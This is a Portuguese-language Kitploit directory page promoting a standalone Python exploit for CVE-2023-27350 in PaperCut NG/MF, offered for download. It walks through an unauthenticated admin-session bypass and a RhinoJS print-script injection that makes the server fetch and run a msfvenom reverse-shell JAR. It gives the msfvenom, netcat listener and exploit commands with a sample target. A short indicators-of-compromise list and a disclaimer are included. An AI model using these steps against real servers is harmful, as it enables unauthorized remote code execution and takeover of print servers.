Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PaperCut-Authentication_Bypass_and_RCE — Este exploit é baseado no CVE-2023-27350 e foi construído a partir do exploit original por horizon3ai e do módulo Metasploit. | Kitploit
Ferramentas/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoFerramenta de Acesso Remoto

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

Este exploit é baseado no CVE-2023-27350 e foi construído a partir do exploit original por horizon3ai e do módulo Metasploit.

Ver Repositório
há 2 mesesAinda não revisado

CVE-2023-27350 — Bypass de Autenticação e RCE no PaperCut NG/MF

Exploit Python independente para a vulnerabilidade crítica de bypass de autenticação e execução remota de código no PaperCut NG/MF. CVSS 9.8.

Descrição

CVE-2023-27350 afeta o PaperCut NG e MF nas versões anteriores a 20.1.7, 21.2.11 e 22.0.9. A falha permite que um atacante não autenticado acesse o endpoint /app?service=page/SetupCompleted — uma página de configuração que deveria ser acessível apenas durante a instalação inicial — e obtenha uma sessão administrativa válida sem qualquer credencial.

Com acesso de administrador, o atacante pode ativar o mecanismo de script de impressão do PaperCut e injetar código arbitrário executado pela JVM do servidor, resultando em RCE completo no contexto do usuário do serviço.

Versões Afetadas

VersãoVersão Corrigida
20.x20.1.7
21.x21.2.11
22.x22.0.9

As versões 18.x e anteriores não receberam patch oficial.

Implementações de Referência

Este exploit foi desenvolvido a partir da análise de duas implementações públicas:

1. horizon3ai/CVE-2023-27350 (Python)

  • Repositório: https://github.com/horizon3ai/CVE-2023-27350
  • Abordagem: usa Runtime.exec() com uma string simples para executar comandos
  • Limitações: Runtime.exec(String) não processa metacaracteres de shell (>&, |, 0>&1), tornando os payloads de reverse shell ineficazes. O script também codifica o ID da impressora (l1001) e verifica strings de sucesso apenas em inglês, falhando em instâncias que não estão em inglês
  • Suposição incorreta do mecanismo: não considera que o PaperCut usa RhinoJS (não BeanShell), o que causa erros de sintaxe em certos payloads Java

2. rapid7/metasploit-framework — PaperCutNG Authentication Bypass

  • Módulo: exploit/multi/http/papercut_ng_rce
  • Abordagem: carrega um JAR do Metasploit na JVM via URLClassLoader, evitando qualquer dependência de shell
  • Limitações: requer o Metasploit Framework completo e gera um payload Java/Meterpreter; não facilmente adaptável para uso standalone com nc

Requisitos

root@kitploit:~
Python 3.x
requests
msfvenom (parte do Metasploit Framework)
nc (netcat)
root@kitploit:~
pip install requests

Uso

1. Gerar o payload JAR

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<SEU_IP> LPORT=<PORTA_SHELL> \
  -f jar -o payload.jar

2. Iniciar um listener

root@kitploit:~
nc -lvnp <PORTA_SHELL>

3. Executar o exploit

root@kitploit:~
python exploit.py \
  -u http://<ALVO>:9191 \
  -j payload.jar \
  -lh <SEU_IP> \
  -lp <PORTA_HTTP> \
  -rp <PORTA_SHELL>

Exemplo:

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

Parâmetros

Como Funciona

root@kitploit:~
1. Bypass de autenticação via /app?service=page/SetupCompleted
        ↓
2. Obter JSESSIONID de admin sem credenciais
        ↓
3. Selecionar [Template Printer] (l1001)
        ↓
4. Injetar script RhinoJS no campo de script de impressão
        ↓
5. Script cria um URLClassLoader apontando para nosso servidor HTTP
        ↓
6. A JVM do PaperCut baixa e executa payload.jar
        ↓
7. Reverse shell

Indicadores de Compromisso (IoC)

  • Acesso a /app?service=page/SetupCompleted sem uma sessão anterior
  • Modificação das configurações print-and-device.script.enabled e print.script.sandboxed (versões >= 19)
  • Conexão HTTP de saída do servidor PaperCut para um IP externo
  • Instanciação de URLClassLoader com uma URL externa nos logs da JVM

Aviso Legal

Este exploit é fornecido apenas para fins educacionais e uso autorizado (testes de penetração, CTF, ambientes de laboratório). O uso não autorizado contra sistemas sem permissão explícita é ilegal. O autor não é responsável por qualquer uso indevido.

Baixar ferramenta
ParâmetroDescriçãoPadrão
-u / --urlURL base do PaperCutobrigatório
-j / --jarCaminho para payload.jarobrigatório
-lh / --lhostSeu IP (o alvo se conectará de volta aqui)obrigatório
-lp / --lportPorta HTTP para servir o JAR9090
-rp / --rportPorta do reverse shell4444